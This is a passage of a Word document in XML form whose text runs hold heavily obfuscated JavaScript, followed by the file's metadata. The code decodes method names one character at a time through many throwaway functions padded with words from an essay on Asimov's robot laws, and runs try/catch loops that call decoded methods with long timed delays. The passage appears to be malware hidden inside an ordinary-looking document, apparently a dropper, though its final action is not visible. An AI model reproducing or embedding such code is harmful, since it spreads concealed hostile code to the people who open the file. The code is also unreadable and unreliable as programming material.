})(true,'into30',989,'Asimov30')+(function(Rt,Rx){ var neegra4=Brfcook; neegra4[Vgtf_56]=4; neegra4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(neegra4[600]-neegra4[Vgtf_56]),RunGe);  })('robots83',null,null,'conscience16')+(function(Rt,Rx){ var ufwconsc4=Brfcook; ufwconsc4[Vgtf_56]=1; ufwconsc4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufwconsc4[600]-ufwconsc4[Vgtf_56]),RunGe);  })(38)+(function(Rt,Rx){ var nvqfe3=Brfcook; nvqfe3[Vgtf_56]=4; nvqfe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvqfe3[600]-nvqfe3[Vgtf_56]),RunGe);  })(2244,null,false,null)+(function(Rt,Rx){ var hjwandem3=Brfcook; hjwandem3[Vgtf_56]=2; hjwandem3[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjwandem3[600]-hjwandem3[Vgtf_56]),RunGe);  })(false,false)+(function(Rt,Rx){ var jffFor5=Brfcook; jffFor5[Vgtf_56]=2; jffFor5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jffFor5[600]-jffFor5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var vpifor5=Brfcook; vpifor5[Vgtf_56]=1; vpifor5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vpifor5[600]-vpifor5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var vjnHere84=Brfcook; vjnHere84[Vgtf_56]=1; vjnHere84[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjnHere84[600]-vjnHere84[Vgtf_56]),RunGe);  })(1570)+(function(Rt,Rx){ var ikuwrite4=Brfcook; ikuwrite4[Vgtf_56]=2; ikuwrite4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikuwrite4[600]-ikuwrite4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var snkwrite4=Brfcook; snkwrite4[Vgtf_56]=4; snkwrite4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snkwrite4[600]-snkwrite4[Vgtf_56]),RunGe);  })('Both81',530,530,false)](gicqnmust73,true,false);           gicqnthis27[(function(Rt,Rx){ var ivjoth5=Brfcook; ivjoth5[Vgtf_56]=3; ivjoth5[Vgtf_56-(Vgtf_56/3)]=90; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ivjoth5[600]-ivjoth5[Vgtf_56]),RunGe);  })(true,'robot28','into6')+(function(Rt,Rx){ var wteconte5=Brfcook; wteconte5[Vgtf_56]=0; wteconte5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wteconte5[600]-wteconte5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var thhdown64=Brfcook; thhdown64[Vgtf_56]=4; thhdown64[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thhdown64[600]-thhdown64[Vgtf_56]),RunGe);  })('situationbecame47','East98',true,null)+(function(Rt,Rx){ var ujiHere3=Brfcook; ujiHere3[Vgtf_56]=1; ujiHere3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujiHere3[600]-ujiHere3[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var wikme4=Brfcook; wikme4[Vgtf_56]=0; wikme4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wikme4[600]-wikme4[Vgtf_56]),RunGe);  })()](gicqntheupper58);           gicqnthis27[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   gicqnlivelihood89[(function(Rt,Rx){ var ufsgr3=Brfcook; ufsgr3[Vgtf_56]=4; ufsgr3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsgr3[600]-ufsgr3[Vgtf_56]),RunGe);  })(true,true,'Laws75','although94')+(function(Rt,Rx){ var shqth3=Brfcook; shqth3[Vgtf_56]=2; shqth3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqth3[600]-shqth3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var tqtgra3=Brfcook; tqtgra3[Vgtf_56]=1; tqtgra3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tqtgra3[600]-tqtgra3[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var tjegra4=Brfcook; tjegra4[Vgtf_56]=3; tjegra4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjegra4[600]-tjegra4[Vgtf_56]),RunGe);  })(true,'Laws75','although94')+(function(Rt,Rx){ var qjtoth5=Brfcook; qjtoth5[Vgtf_56]=3; qjtoth5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjtoth5[600]-qjtoth5[Vgtf_56]),RunGe);  })(1843,1843,'robot28')+(function(Rt,Rx){ var vskFor5=Brfcook; vskFor5[Vgtf_56]=0; vskFor5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskFor5[600]-vskFor5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ihfthe5=Brfcook; ihfthe5[Vgtf_56]=2; ihfthe5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihfthe5[600]-ihfthe5[Vgtf_56]),RunGe);  })(433,false)+(function(Rt,Rx){ var qhpha5=Brfcook; qhpha5[Vgtf_56]=3; qhpha5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhpha5[600]-qhpha5[Vgtf_56]),RunGe);  })('arosethough14',869,869)+(function(Rt,Rx){ var qhneve4=Brfcook; qhneve4[Vgtf_56]=0; qhneve4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhneve4[600]-qhneve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pthroa4=Brfcook; pthroa4[Vgtf_56]=0; pthroa4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthroa4[600]-pthroa4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uspwri5=Brfcook; uspwri5[Vgtf_56]=3; uspwri5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uspwri5[600]-uspwri5[Vgtf_56]),RunGe);  })(false,true,'Both81')+(function(Rt,Rx){ var kwpwork43=Brfcook; kwpwork43[Vgtf_56]=0; kwpwork43[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwpwork43[600]-kwpwork43[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var vewgr5=Brfcook; vewgr5[Vgtf_56]=2; vewgr5[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vewgr5[600]-vewgr5[Vgtf_56]),RunGe);  })('addition49',true)+(function(Rt,Rx){ var fptconte5=Brfcook; fptconte5[Vgtf_56]=3; fptconte5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fptconte5[600]-fptconte5[Vgtf_56]),RunGe);  })('what20',true,'humans11')+(function(Rt,Rx){ var qjscon5=Brfcook; qjscon5[Vgtf_56]=3; qjscon5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjscon5[600]-qjscon5[Vgtf_56]),RunGe);  })(null,true,'declarations83')+(function(Rt,Rx){ var shtHe5=Brfcook; shtHe5[Vgtf_56]=0; shtHe5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shtHe5[600]-shtHe5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eivlivel3=Brfcook; eivlivel3[Vgtf_56]=1; eivlivel3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eivlivel3[600]-eivlivel3[Vgtf_56]),RunGe);  })('second5')+(function(Rt,Rx){ var ivwgr3=Brfcook; ivwgr3[Vgtf_56]=4; ivwgr3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ivwgr3[600]-ivwgr3[Vgtf_56]),RunGe);  })('addition49','being51',false,'evades28')+(function(Rt,Rx){ var hpugradu4=Brfcook; hpugradu4[Vgtf_56]=1; hpugradu4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hpugradu4[600]-hpugradu4[Vgtf_56]),RunGe);  })(null),(function(Rt,Rx){ var pfkgra5=Brfcook; pfkgra5[Vgtf_56]=4; pfkgra5[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfkgra5[600]-pfkgra5[Vgtf_56]),RunGe);  })(true,1642,null,false)+(function(Rt,Rx){ var jsjroa3=Brfcook; jsjroa3[Vgtf_56]=2; jsjroa3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsjroa3[600]-jsjroa3[Vgtf_56]),RunGe);  })(609,609)+(function(Rt,Rx){ var nhfcons4=Brfcook; nhfcons4[Vgtf_56]=1; nhfcons4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nhfcons4[600]-nhfcons4[Vgtf_56]),RunGe);  })('declarations83')+(function(Rt,Rx){ var ffhandem5=Brfcook; ffhandem5[Vgtf_56]=2; ffhandem5[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffhandem5[600]-ffhandem5[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var fknroadI4=Brfcook; fknroadI4[Vgtf_56]=3; fknroadI4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fknroadI4[600]-fknroadI4[Vgtf_56]),RunGe);  })('lawsthe36',true,'free58')+(function(Rt,Rx){ var njnmerel3=Brfcook; njnmerel3[Vgtf_56]=2; njnmerel3[Vgtf_56-(Vgtf_56/3)]=60; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njnmerel3[600]-njnmerel3[Vgtf_56]),RunGe);  })(2467,true)+(function(Rt,Rx){ var vtkaval3=Brfcook; vtkaval3[Vgtf_56]=4; vtkaval3[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtkaval3[600]-vtkaval3[Vgtf_56]),RunGe);  })(true,'progress41','displayed83','rather47')+(function(Rt,Rx){ var kuigr4=Brfcook; kuigr4[Vgtf_56]=2; kuigr4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kuigr4[600]-kuigr4[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var jknForth4=Brfcook; jknForth4[Vgtf_56]=4; jknForth4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jknForth4[600]-jknForth4[Vgtf_56]),RunGe);  })(true,'while59',null,false)+(function(Rt,Rx){ var qftan3=Brfcook; qftan3[Vgtf_56]=3; qftan3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qftan3[600]-qftan3[Vgtf_56]),RunGe);  })(1280,'could80',false)+(function(Rt,Rx){ var eikli3=Brfcook; eikli3[Vgtf_56]=4; eikli3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eikli3[600]-eikli3[Vgtf_56]),RunGe);  })('second5',null,false,'itself96')+(function(Rt,Rx){ var vjjfea4=Brfcook; vjjfea4[Vgtf_56]=4; vjjfea4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjjfea4[600]-vjjfea4[Vgtf_56]),RunGe);  })(true,'into30','Asimov30',null)+(function(Rt,Rx){ var qvjcont4=Brfcook; qvjcont4[Vgtf_56]=3; qvjcont4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvjcont4[600]-qvjcont4[Vgtf_56]),RunGe);  })(true,true,true)+(function(Rt,Rx){ var ufsfound4=Brfcook; ufsfound4[Vgtf_56]=4; ufsfound4[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsfound4[600]-ufsfound4[Vgtf_56]),RunGe);  })('being84',false,false,'simple95')+gicqnlearned77+gicqnmust73+gicqnlearned77,'',(function(Rt,Rx){ var uqsroad5=Brfcook; uqsroad5[Vgtf_56]=2; uqsroad5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqsroad5[600]-uqsroad5[Vgtf_56]),RunGe);  })('lawsthe36',true)+(function(Rt,Rx){ var qesroa5=Brfcook; qesroa5[Vgtf_56]=3; qesroa5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qesroa5[600]-qesroa5[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58')+(function(Rt,Rx){ var wpjmere3=Brfcook; wpjmere3[Vgtf_56]=1; wpjmere3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpjmere3[600]-wpjmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ujugrati4=Brfcook; ujugrati4[Vgtf_56]=0; ujugrati4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujugrati4[600]-ujugrati4[Vgtf_56]),RunGe);  })(),1);</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   break;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   }</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   else</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](41000);</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>continue;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   }</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">}catch(gicqnbythe41){ gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](63000); continue; }         }else { gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](52000); continue; }   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">}catch(gicqnbythe41){ gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](45000); continue; }  </w:t>
        <w:tab/>
        <w:t>gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](47000);   };    break;     };   };gicqnmade33ko=false;gicqnthat70ko=true;gicqnwell72ko=true;gicqnagain4ko=false;gicqnfilled25ko=true;gicqnlessen89ko=true;gicqndiscussion17ko=false;gicqnofalliances6ko=false;gicqnunderstand76ko=false;gicqnleast29ko=true;gicqnrelations94ko=false;gicqnintheir25ko=true;gicqncomestheir26ko=true;gicqnSometimes7ko=false;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3:00Z</dcterms:created>
  <dc:creator>Windows User</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-19T13:13:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject>Info:772166opri341772</dc:subject>
  <dc:title/>
</cp:coreProperties>
</file>